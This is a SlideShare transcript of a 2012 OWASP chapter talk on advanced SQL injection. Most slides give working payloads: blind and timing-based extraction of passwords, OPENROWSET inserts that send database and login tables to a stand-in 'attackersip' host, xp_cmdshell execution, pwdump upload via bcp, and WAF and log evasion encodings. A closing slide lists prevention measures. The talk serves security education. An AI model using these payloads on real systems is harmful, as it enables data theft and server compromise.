Owasp Indy Q2 2012 Advanced SQLi

2,680 views
2,600 views

Published on

Published in: Technology
0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
2,680
On SlideShare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
72
Comments
0
Likes
3
Embeds 0
No embeds

No notes for slide

Owasp Indy Q2 2012 Advanced SQLi

  1. 1. Advanced SQLi and Evasion Techniques
  2. 2. About MeIntroductionDamian Profancik | Technical Lead/Security Services Leader @ Apparatus, CISSP dprofancik@gmail.com @integrisec
  3. 3. CreditCesar Cerrudo – CTO, IOActive Labs o http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injecti on.pdfModSecurity Team – Trustwave SpiderLabs o http://blog.spiderlabs.com/2011/07/modsecurity-sql-injection-challenge-lessons- learned.htmlAvi Douglen – OWASP Board Member, Israel o http://www.comsecglobal.com/framework/Upload/SQL_Smuggling.pdf
  4. 4. SQL Injection Basics• Dynamic construction of SQL queries “SELECT * FROM table WHERE user = “ + uname + “ AND pwd = ” + pword + “”• Unsanitized user input uname = or 1=1-- => SELECT * FROM table WHERE user = or 1=1-- AND pwd =• Excessive permission o Web services running as privileged user with db_owner rights o Connecting to database using sa, dbo, or sysadmin accounts o Lax file system permissions
  5. 5. Advance SQLi Techniques• Blind SQL Injection• Data Exfiltration• Privilege Escalation• Command Execution• Uploading Files• Internal DB Server Exploration• Port Scanning• Firewall Evasion• Log Evasion• WAF Evasion
  6. 6. Blind SQL Injection
  7. 7. Blind SQL Injection• Differential Analysis Example: http://www.someforum.com/posts.php?id=2 SELECT author, title, body FROM posts WHERE ID = 2 http://www.someforum.com/posts.php?id=2 and 1=2 SELECT author, title, body FROM posts WHERE ID = 2 and 1=2 http://www.someforum.com/posts.php?id=2 and 1=1 SELECT author, title, body FROM posts WHERE ID = 2 and 1=1
  8. 8. Blind SQL Injection (cont.)• Database Management System Fingerprinting o System Functions • MS SQL Server = getdate() • MySQL = now() • Oracle = sysdate() • Example: http://www.someforum.com/posts.php?id=2 and getdate()=getdate() o String Concatenation • MS SQL Server = + • MySQL = +, CONCAT() • Oracle = ||, CONCAT() • Example: http://www.someforum.com/posts.php?id=2 and test=te+st o Query Chaining • MS SQL Server, MySQL = allows chaining with semicolon • Oracle = does NOT allow chaining with semicolon • Example: http://www.someforum.com/posts.php?id=2; commit --
  9. 9. Blind SQL Injection (cont.)• Timing Attacks o Adding delay • SQL Server = WAIT FOR DELAY 0:0:10‘ • MySQL = BENCHMARK(10000000,ENCODE(MSG,by 10 seconds)),null) • PostgreSQL = pg_sleep(10) • Oracle = Union with query that contains a lot of results o SELECT IF(condition, true, false) Example: …1 UNION SELECT IF(SUBSTRING(password,1,1) = CHAR(50),BENCHMARK(10000000,ENCODE(MSG,by 10 seconds)),null) FROM users WHERE userid = 1;
  10. 10. Attacking MS SQL Server
  11. 11. Linked and Remote Servers• OPENROWSET Example: SELECT * FROM OPENROWSET( SQLOLEDB, uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433; SELECT * FROM table )• OPENDATASOURCE Example: SELECT * FROM OPENDATASOURCE( SQLOLEDB, uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433; ) .DatabaseName.dbo.TableName
  12. 12. Data Exfiltration• Remote server INSERT Example: INSERT INTO OPENROWSET(SQLOLEDB, uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;, SELECT * FROM table1) SELECT * FROM table2
  13. 13. Data Exfiltration (cont.) INSERT INTO OPENROWSET(SQLOLEDB, uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;, SELECT * FROM _sysdatabases) SELECT * FROM master.dbo.sysdatabases INSERT INTO OPENROWSET(SQLOLEDB, uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;, SELECT * FROM _sysobjects ) SELECT * FROM databasename.dbo.sysobjects INSERT INTO OPENROWSET(SQLOLEDB, uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;, SELECT * FROM _syscolumns) SELECT * FROM databasename.dbo.syscolumns
  14. 14. Data Exfiltration (cont.) INSERT INTO OPENROWSET(SQLOLEDB, uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;, SELECT * FROM table1) SELECT * FROM databasename..table1 INSERT INTO OPENROWSET(SQLOLEDB, uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;, SELECT * FROM table2) SELECT * FROM databasename..table2 INSERT INTO OPENROWSET(SQLOLEDB, uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;, ‘SELECT * FROM _sysxlogins) SELECT * FROM databasename.dbo.sysxlogins
  15. 15. Privilege Escalation• Known vulnerabilities Example: SQL injection vulnerability in the RESTORE DATABASE command that can lead to privilege escalation Team SHATTER - 4/12/2012 - http://packetstormsecurity.org/files/111788/shatter-sqlserver.txt• Often not required o Connection strings using SA, dbo, sysadmin o Web service context
  16. 16. Command Execution Example: INSERT INTO OPENROWSET(SQLOLEDB, uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;, SELECT * FROM temp_table) EXEC master.dbo.xp_cmdshell dir
  17. 17. Uploading FilesOn attacker’s server…1. CREATE TABLE AttackerTable (data text)2. BULK INSERT AttackerTable FROM pwdump.exe WITH (codepage=RAW)On victim’s server…3. EXEC xp_cmdshell bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersIP -Usa -Ppwn3d4. EXEC xp_regwrite HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftMSSQLServerClientConnectTo,AttackersAlias,REG_SZ ,DBMSSOCN,AttackersIP,805. EXEC xp_cmdshell bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersAlias - Usa -Ppwn3d
  18. 18. Uploading Files (cont.) INSERT INTO OPENROWSET(SQLOLEDB, uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;, SELECT * FROM temp_table) EXEC xp_cmdshell "first script line" >> script.vbs … EXEC xp_cmdshell "second script line" >> script.vbs ... EXEC xp_cmdshell "last script line" >> script.vbs EXEC xp_cmdshell script.vbs ==> execute script to download binary
  19. 19. Internal DB Server Exploration• Linked and Remote Servers1. INSERT INTO OPENROWSET(SQLOLEDB, uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;, SELECT * FROM _sysservers) SELECT * FROM master.dbo.sysservers2. INSERT INTO OPENROWSET(SQLOLEDB, uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;, SELECT * FROM _sysservers) SELECT * FROM linkedserver1.master.dbo.sysservers3. INSERT INTO OPENROWSET(SQLOLEDB, uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;, SELECT * FROM _sysdatabases) SELECT * FROM linkedserver1.master.dbo.sysdatabases4. Rinse and repeat…
  20. 20. Port Scanning Example: SELECT * FROM OPENROWSET(SQLOLEDB, uid=sa;pwd=;Network=DBMSSOCN;Address=192.168.1.1,80;timeout=5, SELECT * FROM table)
  21. 21. Evasion Techniques
  22. 22. Firewall Evasion• Use port 80 for outbound Example: INSERT INTO OPENROWSET(SQLOLEDB, uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,80;, SELECT * FROM table1) SELECT * FROM table2
  23. 23. Log Evasion• Inject using POST parameters• Long HTTP requests o IIS truncates requests longer than 4097 characters o Sun-One Application Server truncates at 4092 characters Example: http://www.someforum.com/posts.php?param=<4097 x ‘a’>&id=2 or 1=1--
  24. 24. WAF Evasion• Comments o # = single line comment o -- = single line comment o /* */ = inline, multi-line comment o /*! */ = MySQL-specific inline, multi-line comment Example: http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…• New line o %0D%0A = URL-encoded newline o %0B = URL-encoded vertical separator Example: http://www.someforum.com/posts.php?id=2 UNION%0D%0ASELECT * FROM…
  25. 25. WAF Evasion (cont.)• Character Encoding o Unicode (U+02BC = ʼ) o CHAR() o Hexadecimal o URL-encoding o Double Encoding Example: Double Encoding: URL = http://www.someforum.com/posts.php?id=2 UN%252f%252a%252a%252fION SEL%252f%252a%252a%252fECT * FROM… WAF = http://www.someforum.com/posts.php?id=2 UN%2f%2a%2a%2fION SEL%2f%2a%252a%2fECT * FROM… Result = http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…
  26. 26. WAF Evasion (cont.)• Concatenation o EXEC() o Split/Join o Special Characters (i.e. ‘*‘, ‘+’, ‘%’, etc.) Example: Split/Join: URL = http://www.someforum.com/posts.php?id=SELECT name&id=password FROM users WAF = id=SELECT name id=password FROM users ASP/ASP.Net = id=SELECT name,password FROM users Special Characters: URL = http://www.someforum.com/posts.php?id=SEL%ECT name,password FR%OM users WAF = id=SEL%ECT name,password FR%OM users ASP/ASP.Net = id=SELECT name,password FROM users
  27. 27. SQL Injection Prevention
  28. 28. SQLi Prevention• Sanitize User Input o Normalize Input o Whitelists o Built-in Functions o Regular Expressions o Trust NO data source (i.e. Cookies, Referer, User-Agent, etc.)• Prepared Statements/Parameterized Queries• Stored Procedures• Accounts with Least Privilege• Enable DisallowAdhocAccess registry setting for MS SQL Server• Perform Self Assessments• Use a Web Application Firewall• Filter Outbound Traffic at Firewall
  29. 29. Q&A

×